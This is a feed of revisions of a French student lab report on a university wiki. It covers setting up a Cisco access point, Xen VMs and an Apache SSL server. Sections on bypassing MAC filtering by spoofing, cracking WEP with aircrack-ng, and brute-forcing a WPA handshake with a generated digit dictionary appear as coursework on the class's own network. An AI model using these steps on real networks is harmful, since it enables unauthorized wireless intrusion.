  169  ls&lt;br /&gt;
  170  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  171  mv gandi.cert gandi.crt &lt;br /&gt;
  172  mv dragon.cert dragon.crt &lt;br /&gt;
  173  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  174  a2ensite 000-domain.tld-ssl&lt;br /&gt;
  175  a2ensite /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  176  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  177  a2ensite /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  178  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  179  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  180  ls&lt;br /&gt;
  181  cd /etc/apache2/sites-available/&lt;br /&gt;
  182  ls -l&lt;br /&gt;
  183  mv 000-domain.tld-ssl 000-domain.tld-ssl.conf&lt;br /&gt;
  184  ls -l&lt;br /&gt;
  185  a2ensite 000-domain.tld-ssl&lt;br /&gt;
  186  a2enmod ssl&lt;br /&gt;
  187   service apache2 reload&lt;br /&gt;
  188  netstat -tpln&lt;br /&gt;
  189  ls&lt;br /&gt;
  190  vi 000-domain.tld-ssl.conf&lt;br /&gt;
  191  mkdir /var/www/www.loveandpeace.lol/&lt;br /&gt;
  192  vi /var/www/www.loveandpeace.lol/index.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23158</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23158"/>
				<updated>2015-11-23T16:17:49Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Crackage de la cle wpa&amp;lt;/h4&amp;gt;&lt;br /&gt;
la particularité de ce crackage est le fait de trouver le handshak :&lt;br /&gt;
Pour cela on commance par la ligne de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng -w out --encrypt wpa -c 11 --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois le handshak est obtenus, on cree un dictionnaire pour le bruteforce sur notre cle wpa, pour cela on cree un petit programme en C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
int cpt = 0;&lt;br /&gt;
for(cpt=0;cpt&amp;lt;99999999;cpt++){&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,cpt);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On execute le programme en redirigeant sa sortie vers le fichier dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./bruteforce &amp;gt; dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
une fois le dictionnaire est créer, on utilise aircrack-ng ainsi que notre fichier capture(avec le handshak)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [00:58:47] 12399908 keys tested (3597.80 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399905 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 10 F5 F9 6D F5 5D 9A D7 66 CE 4D 59 A7 28 E8 FC &lt;br /&gt;
                       AF FD 13 C5 BF 80 CC AB 1E 72 7F 8F 07 36 3E E5 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : FD 23 BE EE 18 CA 1E 70 D5 E8 2A 44 0A B7 08 7C &lt;br /&gt;
                       CD BA E5 A4 5A 34 EE 2F B4 13 2A 20 81 A7 7A 1B &lt;br /&gt;
                       3E 5A E1 14 D6 4D B9 0B FA 71 D1 C7 FF 01 FE F9 &lt;br /&gt;
                       3A 24 2A F3 91 6F C5 AA 5A 93 6D 64 F9 BC 59 68 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : DE 44 15 8A 67 04 2C FD 62 79 93 1F 08 7B 34 D6 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, qhelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l'access root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console Werewolf&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root&lt;br /&gt;
 apt-get install mailx&lt;br /&gt;
 apt-get install bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost 193.48.57.180:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.loveandpeace.lol&lt;br /&gt;
        ServerAlias loveandpeace.lol&lt;br /&gt;
        DocumentRoot /var/www/www.loveandpeace.lol/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/dragon.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/dragon.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  155  cat /root/mbox &lt;br /&gt;
  156  nano /root/mbox &lt;br /&gt;
  157  nano dragon.crt&lt;br /&gt;
  158  ls&lt;br /&gt;
  159  nano gandi.cert&lt;br /&gt;
  160  mv dragon.crt dragon.cert&lt;br /&gt;
  161  ls&lt;br /&gt;
  162  ls&lt;br /&gt;
  163  vi /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  164  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  165  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  166  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  167  nano /etc/apache2/sites-available/000-default.conf &lt;br /&gt;
  168  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  169  ls&lt;br /&gt;
  170  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  171  mv gandi.cert gandi.crt &lt;br /&gt;
  172  mv dragon.cert dragon.crt &lt;br /&gt;
  173  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  174  a2ensite 000-domain.tld-ssl&lt;br /&gt;
  175  a2ensite /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  176  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  177  a2ensite /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  178  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  179  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  180  ls&lt;br /&gt;
  181  cd /etc/apache2/sites-available/&lt;br /&gt;
  182  ls -l&lt;br /&gt;
  183  mv 000-domain.tld-ssl 000-domain.tld-ssl.conf&lt;br /&gt;
  184  ls -l&lt;br /&gt;
  185  a2ensite 000-domain.tld-ssl&lt;br /&gt;
  186  a2enmod ssl&lt;br /&gt;
  187   service apache2 reload&lt;br /&gt;
  188  netstat -tpln&lt;br /&gt;
  189  ls&lt;br /&gt;
  190  vi 000-domain.tld-ssl.conf&lt;br /&gt;
  191  mkdir /var/www/www.loveandpeace.lol/&lt;br /&gt;
  192  vi /var/www/www.loveandpeace.lol/index.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23105</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23105"/>
				<updated>2015-11-20T11:30:03Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Crackage de la cle wpa&amp;lt;/h4&amp;gt;&lt;br /&gt;
la particularité de ce crackage est le fait de trouver le handshak :&lt;br /&gt;
Pour cela on commance par la ligne de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng -w out --encrypt wpa -c 11 --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
